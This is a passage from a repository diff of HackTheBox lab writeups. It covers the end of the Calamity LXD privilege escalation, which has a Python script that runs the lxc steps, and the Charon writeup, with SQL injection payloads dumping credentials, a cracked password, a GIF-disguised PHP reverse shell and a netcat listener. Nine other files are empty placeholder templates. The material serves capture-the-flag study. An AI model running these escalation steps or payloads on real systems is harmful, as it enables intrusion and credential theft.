Executing busybox-1.31.1-r19.post-install
(3/19) Installing alpine-baselayout (3.2.0-r7)
Executing alpine-baselayout-3.2.0-r7.pre-install
Executing alpine-baselayout-3.2.0-r7.post-install
(4/19) Installing openrc (0.42.1-r10)
Executing openrc-0.42.1-r10.post-install
(5/19) Installing alpine-conf (3.9.0-r1)
(6/19) Installing libcrypto1.1 (1.1.1g-r0)
(7/19) Installing libssl1.1 (1.1.1g-r0)
(8/19) Installing ca-certificates-bundle (20191127-r4)
(9/19) Installing libtls-standalone (2.9.1-r1)
(10/19) Installing ssl_client (1.31.1-r19)
(11/19) Installing zlib (1.2.11-r3)
(12/19) Installing apk-tools (2.10.5-r1)
(13/19) Installing busybox-suid (1.31.1-r19)
(14/19) Installing busybox-initscripts (3.2-r2)
Executing busybox-initscripts-3.2-r2.post-install
(15/19) Installing scanelf (1.2.6-r0)
(16/19) Installing musl-utils (1.1.24-r9)
(17/19) Installing libc-utils (0.7.2-r3)
(18/19) Installing alpine-keys (2.2-r0)
(19/19) Installing alpine-base (3.12.0-r0)
Executing busybox-1.31.1-r19.trigger
OK: 8 MiB in 19 packages
Let it build for a while; once it's done, we use scp to copy the tar.gz onto the target, into xalvas' home directory:
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd/lxd-alpine-builder]
→ scp alpine-v3.12-i686-20200813_2019.tar.gz xalvas@10.10.10.27:
xalvas@10.10.10.27's password:
alpine-v3.12-i686-20200813_2019.tar.gz 100% 3135KB 535.0KB/s 00:05
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd/lxd-alpine-builder]
→ ssh xalvas@10.10.10.27
xalvas@10.10.10.27's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-81-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
9 packages can be updated.
8 updates are security updates.
Last login: Thu Aug 13 12:40:34 2020 from 10.10.14.8
xalvas@calamity:~$ mkdir lxd
xalvas@calamity:~$ mv al
alarmclocks/ alpine-v3.12-i686-20200813_2019.tar.gz
xalvas@calamity:~$ mv alpine-v3.12-i686-20200813_2019.tar.gz lxd/
xalvas@calamity:~$ cd lxd/
xalvas@calamity:~/lxd$
From here, all we need to do is import the alpine image and init the container:
xalvas@calamity:~/lxd$ lxc image import alpine-v3.12-i686-20200813_2019.tar.gz --alias nothing-alpine
Generating a client certificate. This may take a minute...
If this is your first time using LXD, you should also run: sudo lxd init
To start your first container, try: lxc launch ubuntu:16.04
Image imported with fingerprint: 705e08c329b2c8f7d803a5b7b943b828631ab50a5bf05cf8bd62cb4d48c150f9
xalvas@calamity:~/lxd$
xalvas@calamity:~/lxd$ lxc image list
+----------------+--------------+--------+-------------------------------+------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+----------------+--------------+--------+-------------------------------+------+--------+------------------------------+
| nothing-alpine | 705e08c329b2 | no | alpine v3.12 (20200813_20:19) | i686 | 3.06MB | Aug 13, 2020 at 6:34pm (UTC) |
+----------------+--------------+--------+-------------------------------+------+--------+------------------------------+
xalvas@calamity:~/lxd$ lxc init nothing-alpine privesc -c security.privileged=true
Creating privesc
xalvas@calamity:~/lxd$ lxc list
+---------+---------+------+------+------------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+---------+---------+------+------+------------+-----------+
| privesc | STOPPED | | | PERSISTENT | 0 |
+---------+---------+------+------+------------+-----------+
Here we init our alpine container with security.privileged=true, so processes inside it run as real uid 0 rather than a remapped user. Next we add a disk device named host-root that mounts the host's / at /mnt/root inside the container. Once the container is started, a shell inside it runs as root, and because the container is privileged that root can read and write the host filesystem through /mnt/root, so the root flag is readable at /mnt/root/root/root.txt from inside the container.
xalvas@calamity:~/lxd$ lxc config device add privesc host-root disk source=/ path=/mnt/root
Device host-root added to privesc
xalvas@calamity:~/lxd$ lxc start privesc
xalvas@calamity:~/lxd$ lxc exec privesc /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cat /mnt/root/root/root.txt
9bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it ! We have been able to print out the root flag.
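The lxd escalation above is a fixed sequence of lxc invocations, and forgetting a step (the privileged flag, or the disk device) is the usual reason it fails. The following is an added example, my code and not part of the original writeup: it checks that the current user is actually in the lxd group, encodes the exact command sequence used above plus a cleanup sequence for removing the container and image afterwards, and can either print the plan (dry run) or execute it. The alias `nothing-alpine` and container name `privesc` are the ones used above; the `--force` on stop and the `--` separator for exec are standard lxc syntax.

```python
import grp
import os
import pwd
import shlex
import subprocess
from typing import List

def in_group(name: str = "lxd") -> bool:
    """True if the current user is a member of the named group (lxd membership is the precondition)."""
    try:
        g = grp.getgrnam(name)
    except KeyError:
        return False
    user = pwd.getpwuid(os.getuid()).pw_name
    return os.getgid() == g.gr_gid or user in g.gr_mem

def privesc_plan(image: str, alias: str = "nothing-alpine", name: str = "privesc") -> List[List[str]]:
    """The lxc command sequence from the writeup, as argv lists."""
    return [
        ["lxc", "image", "import", image, "--alias", alias],
        ["lxc", "init", alias, name, "-c", "security.privileged=true"],
        ["lxc", "config", "device", "add", name, "host-root", "disk", "source=/", "path=/mnt/root"],
        ["lxc", "start", name],
        ["lxc", "exec", name, "--", "cat", "/mnt/root/root/root.txt"],
    ]

def cleanup_plan(alias: str = "nothing-alpine", name: str = "privesc") -> List[List[str]]:
    """Undo the escalation: stop and delete the container, then the imported image."""
    return [
        ["lxc", "stop", name, "--force"],
        ["lxc", "delete", name],
        ["lxc", "image", "delete", alias],
    ]

def run_plan(plan: List[List[str]], dry_run: bool = True) -> List[str]:
    """Print-or-run each command; returns the rendered command lines (dry run) or their stdout."""
    results = []
    for argv in plan:
        if dry_run:
            results.append(shlex.join(argv))
        else:
            completed = subprocess.run(argv, capture_output=True, text=True, check=True)
            results.append(completed.stdout)
    return results

if __name__ == "__main__":
    import sys
    image = sys.argv[1] if len(sys.argv) > 1 else "alpine-v3.12-i686-20200813_2019.tar.gz"
    if not in_group("lxd"):
        print("current user is not in the lxd group; this escalation will not work")
    for line in run_plan(privesc_plan(image), dry_run=True):
        print(line)
```

Run with `dry_run=False` on the target once the image tarball is in the working directory; for an interactive root shell instead of just the flag, replace the last command of the plan with `lxc exec privesc -- /bin/sh` as in the writeup, and run `cleanup_plan()` afterwards so the privileged container does not outlive the engagement.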
## **Conclusion**
Here we can see the progress graph :
![](img/2_graph.png)

Hard/20.md Normal file
@@ -0,0 +1,66 @@
# Ellingson Writeup
![](img/20.png)
## Introduction :
Ellingson is a hard linux box released back in May 2019.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for tcp ports and **-sU** for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/21.md Normal file
@@ -0,0 +1,66 @@
# Chainsaw Writeup
![](img/21.png)
## Introduction :
Chainsaw is a hard linux box released back in June 2019.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for tcp ports and **-sU** for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/22.md Normal file
@@ -0,0 +1,66 @@
# Player Writeup
![](img/22.png)
## Introduction :
Player is a hard linux box released back in July 2019.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for tcp ports and **-sU** for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/23.md Normal file
@@ -0,0 +1,66 @@
# RE Writeup
![](img/23.png)
## Introduction :
RE is a hard windows box released back in July 2019.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for tcp ports and **-sU** for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/24.md Normal file
@@ -0,0 +1,66 @@
# Scavenger Writeup
![](img/24.png)
## Introduction :
Scavenger is a hard linux box released back in August 2019.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for tcp ports and **-sU** for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/25.md Normal file
@@ -0,0 +1,66 @@
# Zetta Writeup
![](img/25.png)
## Introduction :
Zetta is a hard linux box released back in August 2019.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for tcp ports and **-sU** for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/26.md Normal file
@@ -0,0 +1,66 @@
# Registry Writeup
![](img/26.png)
## Introduction :
Registry is a hard linux box released back in October 2019.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for tcp ports and **-sU** for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/27.md Normal file
@@ -0,0 +1,66 @@
# Control Writeup
![](img/27.png)
## Introduction :
Control is a hard windows box released back in November 2019.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for tcp ports and **-sU** for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/28.md Normal file
@@ -0,0 +1,66 @@
# Patents Writeup
![](img/28.png)
## Introduction :
Patents is a hard linux box released back in January 2020.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for tcp ports and **-sU** for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/29.md Normal file
# Oouch Writeup
![](img/29.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for TCP ports and **-sU** for UDP ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/3.md Normal file
# Charon Writeup
![](img/3.png)
## Introduction :
Charon is a hard linux box released back in July 2017.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for TCP ports and **-sU** for UDP ports.
[ 10.10.14.11/23 ] [ /dev/pts/10 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.31 --max-retries 0 -Pn --min-rate=500 | grep Discovered
[sudo] password for nothing:
Discovered open port 22/tcp on 10.10.10.31
Discovered open port 80/tcp on 10.10.10.31
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.10.14.11/23 ] [ /dev/pts/10 ] [~]
→ nmap -sCV -p22,80 10.10.10.31
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 18:44 BST
Nmap scan report for 10.10.10.31
Host is up (0.027s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09:c7:fb:a2:4b:53:1a:7a:f3:30:5e:b8:6e:ec:83:ee (RSA)
| 256 97:e0:ba:96:17:d4:a1:bb:32:24:f4:e5:15:b4:8a:ec (ECDSA)
|_ 256 e8:9e:0b:1c:e7:2d:b6:c9:68:46:7c:b3:32:ea:e9:ef (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Frozen Yogurt Shop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.89 seconds
## **Part 2 : Getting User Access**
Our nmap scan picked up port 80, so let's investigate it:
![](prg/3/001.png)
[ 10.10.14.11/23 ] [ /dev/pts/10 ] [~]
→ nikto -h http://10.10.10.31/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.31
+ Target Hostname: 10.10.10.31
+ Target Port: 80
+ Start Time: 2020-08-08 18:46:07 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 9f2, size: 552d7084393f2, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7863 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2020-08-08 18:51:23 (GMT1) (316 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Doesn't look like there's much here for us to make use of, so let's use gobuster:
[ 10.10.14.11/23 ] [ /dev/pts/11 ] [~]
→ gobuster dir -u http://10.10.10.31/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x "txt,php,html,js,xml,pdf"
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.31/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html,js,xml,pdf,txt
[+] Timeout: 10s
===============================================================
2020/08/08 18:50:04 Starting gobuster
===============================================================
/about.html (Status: 200)
/index.md (Status: 200)
/product.html (Status: 200)
/contact.html (Status: 200)
/images (Status: 301)
/blog.html (Status: 200)
/css (Status: 301)
/js (Status: 301)
/include (Status: 301)
/fonts (Status: 301)
/cmsdata (Status: 301)
/server-status (Status: 403)
===============================================================
2020/08/08 19:09:12 Finished
===============================================================
The idea here was to run gobuster again against the /cmsdata directory, which turns up the login.php page:
[ 10.10.14.11/23 ] [ /dev/pts/11 ] [~]
→ gobuster dir -u http://10.10.10.31/cmsdata/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x "txt,php,html,js,xml,pdf"
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.31/cmsdata/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,php,html,js,xml,pdf
[+] Timeout: 10s
===============================================================
2020/08/08 19:13:49 Starting gobuster
===============================================================
/images (Status: 301)
/scripts (Status: 301)
/menu.php (Status: 302)
/login.php (Status: 200)
/upload.php (Status: 302)
/css (Status: 301)
/js (Status: 301)
/include (Status: 301)
/forgot.php (Status: 200)
Progress: 89237 / 220561 (40.46%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/08/08 19:21:32 Finished
===============================================================
![](prg/3/002.png)
So on /cmsdata/login.php we stumble upon a SuperCMS login page. There isn't much on the login page itself, so we take a look at the "forgot password?" page and inspect the request with Burp Suite:
![](prg/3/003.png) ![](prg/3/004.png)
Here we get a generic error saying the email isn't found, but let's test whether we can trigger a SQL injection:
![](prg/3/005.png)
Here we see something is up. Let's poke at it further by appending "-- -" to comment out the rest of the query, which should remove the error and confirm that we are dealing with a SQL injection:
![](prg/3/006.png)
Now that we know it is a SQL injection, we can test it further:
![](prg/3/007.png) ![](prg/3/008.png)
So now we know the 4th field takes a string, which is an email, so let's poke around the SQL injection further:
![](prg/3/009.png)
And we found the supercms database! Now let's find the name of the table containing those emails:
![](prg/3/010.png)
So far we know we are in the supercms database and are looking at the table called "license", but with further enumeration we find another table called "operators":
![](prg/3/011.png)
So now we have the name of the tables, we will enumerate the columns:
![](prg/3/012.png) ![](prg/3/013.png) ![](prg/3/014.png)
Now we know the table operators contains the columns `__username_` and `__password_`:
![](prg/3/015.png)
So now let's just dump the usernames and passwords:
![](prg/3/016.png) ![](prg/3/017.png)
And we found credentials! **super_cms_adm:0b0689ba94f94533400f4decd87fa260** However the password is hashed, so we use hash-identifier to figure out which format it is:
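Before moving on to the hash, here is the injection chain from the screenshots above replayed in code. This is an added example, not code from the writeup or from SuperCMS: the target is MySQL and its schema is not shown, so the tables below are a constructed stand-in (only the names `license`, `operators`, `__username_`, `__password_` and the admin row come from the dump), sqlite_master stands in for information_schema, and `||` is SQLite's concatenation (on MySQL you would use CONCAT()). The vulnerable lookup interpolates the e-mail into the query and renders only the 4th column, which is why the column count and the "which field takes a string" step mattered; the fixed version binds the parameter.

```python
import sqlite3

# Constructed stand-in for the SuperCMS database enumerated above.  The real
# target is MySQL and its exact schema is not shown in the writeup; the table and
# column names follow what the injection dumped, everything else is assumed.
def build_demo_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE license (id INTEGER, owner TEXT, status TEXT, email TEXT);
        INSERT INTO license VALUES (1, 'shop', 'active', 'owner@example.com');
        CREATE TABLE operators (id INTEGER, __username_ TEXT, __password_ TEXT);
        INSERT INTO operators VALUES
            (1, 'super_cms_adm', '0b0689ba94f94533400f4decd87fa260');
    """)
    return con


def forgot_password_vulnerable(con, email):
    """The pattern behind forgot.php: the submitted e-mail is pasted into the
    query and only the 4th column of the result is rendered back to the user.
    Returns {"error": ..., "rows": [...]} so the caller sees both the SQL error
    (step 1 above) and whatever the UNION smuggles out through column 4."""
    sql = f"SELECT id, owner, status, email FROM license WHERE email = '{email}'"
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return {"error": str(exc), "rows": []}
    return {"error": None, "rows": [row[3] for row in rows]}


def forgot_password_fixed(con, email):
    """Same lookup with a bound parameter: the quote never reaches the parser."""
    rows = con.execute(
        "SELECT id, owner, status, email FROM license WHERE email = ?", (email,)
    ).fetchall()
    return {"error": None, "rows": [row[3] for row in rows]}


# The payload chain from the screenshots, one step per entry.  sqlite_master
# plays the role MySQL's information_schema.tables / .columns played on the box.
PAYLOADS = {
    "break_query":  "x'",
    "comment_out":  "x'-- -",
    "column_count": "x' UNION SELECT 1,2,3,4-- -",
    "tables":       "x' UNION SELECT 1,2,3,name FROM sqlite_master WHERE type='table'-- -",
    "columns":      "x' UNION SELECT 1,2,3,sql FROM sqlite_master WHERE name='operators'-- -",
    "dump_creds":   "x' UNION SELECT 1,2,3,__username_ || ':' || __password_ FROM operators-- -",
}


def run_chain(con, lookup=forgot_password_vulnerable):
    """Replay every payload through a lookup function and collect the results."""
    return {name: lookup(con, payload) for name, payload in PAYLOADS.items()}


if __name__ == "__main__":
    db = build_demo_db()
    for step, result in run_chain(db).items():
        print(f"{step:13} error={result['error']!r} rows={result['rows']}")
    print("fixed:", run_chain(db, forgot_password_fixed)["dump_creds"])
```

Running it prints the SQL error for the bare quote, an empty (error-free) result once the comment is appended, `4` for the column-count probe, the table names, the CREATE statement of operators, and finally `super_cms_adm:0b06...`; the parameterised version returns nothing for every payload.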
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~]
→ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: 0b0689ba94f94533400f4decd87fa260
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
And we see that it is most likely an MD5 hash. We could use john or hashcat with a wordlist, but for this example we'll just use an online hash cracker: https://www.onlinehashcrack.com
![](prg/3/018.png) ![](prg/3/019.png)
And finally we have the credentials **super_cms_adm:tamarro**, so we use them to log in:
![](prg/3/020.png)
Once logged in we see a big red flag: we are able to upload an image, so we'll try to inject a reverse shell there:
![](prg/3/021.png)
So here let's make our own simple php reverse shell:
![](prg/3/022.png)
But when we upload it we see that the file extension is checked:
![](prg/3/023.png)
So let's disguise our PHP reverse shell as a gif, making sure the magic bytes are also correct:
![](prg/3/024.png) ![](prg/3/025.png)
Here we see 2 interesting things once we upload our PHP/gif polyglot: we get the **relative** path of our gif, ../images/nothing.php.gif, and a hidden input with a base64-encoded name:
![](prg/3/026.png)
Unsure what to do with that, we'll just try to access our reverse PHP gif to get a reverse shell:
![](prg/3/027.png) ![](prg/3/028.png)
Since our reverse PHP gif isn't executed (a .gif is served as an image, not handed to PHP), we have to make use of that hidden field. Its base64 name decodes to "testfile1": adding an input named testfile1 to the form and setting its value to a file name (e.g. writeup.php; we use nothing.php) makes the page rename the uploaded file to the value specified. So let's intercept the upload.php page itself in Burp Suite, in order to modify the HTML and expose the "testfile1" input field:
![](prg/3/030.png)
Now that we have the request, we do Action > Do intercept > Response to this request and then hit "forward":
![](prg/3/032.png)
Then we make sure the other input field is uncommented and named properly, and forward the request:
![](prg/3/033.png)
This allows us to submit a gif file that then gets renamed to a php file, so let's submit it and browse to it:
![](prg/3/034.png)
It uploads successfully so let's browse to it at **http://10.10.10.31/images/nothing.php** :
![](prg/3/035.png)
And there we have a reverse shell as www-data! Now let's poke around, but before that let's upgrade our reverse shell to a fully interactive one:
www-data@charon:/var/www/html/freeeze/images$ which python
which python
/usr/bin/python
Python is there for us to use, so let's use the pty module to spawn a TTY shell:
www-data@charon:/var/www/html/freeeze/images$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@charon:/var/www/html/freeeze/images$ ^Z
[1]+ Stopped nc -lvnp 9001
[ 10.10.14.8/23 ] [ /dev/pts/16 ] [~]
→ stty raw -echo
[ 10.10.14.8/23 ] [ /dev/pts/16 ] [~]
→ nc -lvnp 9001
www-data@charon:/var/www/html/freeeze/images$
www-data@charon:/var/www/html/freeeze/images$
www-data@charon:/var/www/html/freeeze/images$
Once we have the TTY shell from python, we background our netcat process with CTRL+Z, type **stty raw -echo**, then **fg** to get back into our netcat reverse shell, and we now have a fully interactive shell:
www-data@charon:/var/www/html/freeeze/images$ ls -lash
ls -lash
total 904K
4.0K drwxr-xrwx 3 root root 4.0K Aug 13 14:43 .
4.0K drwxr-xrwx 8 root root 4.0K Jun 26 2017 ..
72K -rwxr-xr-x 1 root root 72K Dec 23 2016 berries.png
4.0K -rwxr-xr-x 1 root root 1.2K Dec 23 2016 bg-border.gif
64K -rwxr-xr-x 1 root root 62K Dec 23 2016 bg-header-about.jpg
152K -rwxr-xr-x 1 root root 152K Dec 23 2016 bg-home.jpg
4.0K -rwxr-xr-x 1 root root 994 Dec 23 2016 bg-transparent.png
20K -rwxr-xr-x 1 root root 19K Dec 23 2016 blackberry.jpg
20K -rwxr-xr-x 1 root root 19K Dec 23 2016 blueberry.jpg
20K -rwxr-xr-x 1 root root 19K Dec 23 2016 cantaloupe.jpg
4.0K -rwxr-xr-x 1 root root 2.7K Dec 23 2016 check-in.png
4.0K -rwxr-xr-x 1 root root 3.7K Jun 23 2017 f.png
24K -rwxr-xr-x 1 root root 21K Dec 23 2016 grapes.jpg
24K -rwxr-xr-x 1 root root 21K Dec 23 2016 green-apple.jpg
16K -rwxr-xr-x 1 root root 13K Dec 23 2016 icons.png
20K -rwxr-xr-x 1 root root 17K Dec 23 2016 kiwi.jpg
8.0K -rwxr-xr-x 1 root root 7.1K Jun 23 2017 logo.png
20K -rwxr-xr-x 1 root root 18K Dec 23 2016 mango.jpg
60K -rwxr-xr-x 1 root root 60K Dec 23 2016 map.jpg
4.0K drwxr-xr-x 2 root root 4.0K Dec 23 2016 mobile
84K -rwxr-xr-x 1 root root 82K Dec 23 2016 new-chills.png
4.0K -rw-r--r-- 1 www-data www-data 83 Aug 13 14:43 nothing.php
4.0K -rw-r--r-- 1 www-data www-data 83 Aug 13 13:56 nothing.php.gif
84K -rwxr-xr-x 1 root root 82K Dec 23 2016 on-diet.png
20K -rwxr-xr-x 1 root root 20K Dec 23 2016 pineapple.jpg
4.0K -rw-r--r-- 1 www-data www-data 103 Jun 26 2017 small.png
20K -rwxr-xr-x 1 root root 20K Dec 23 2016 strawberry.jpg
116K -rwxr-xr-x 1 root root 116K Dec 23 2016 strwberry-delights.jpg
